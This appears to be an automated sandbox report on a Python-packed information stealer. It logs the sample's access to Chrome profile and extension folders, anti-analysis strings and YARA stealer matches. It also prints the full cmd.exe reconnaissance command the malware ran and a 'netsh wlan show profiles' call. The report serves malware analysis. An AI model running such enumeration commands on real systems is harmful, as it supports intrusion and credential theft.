Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\_cffi_backend.cp310-win_amd64.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Temp\49flztqg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfba VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\net1.exe Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B6D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF7B2B6D010
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B85C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 0_2_00007FF7B2B85C00
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ollydbg.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
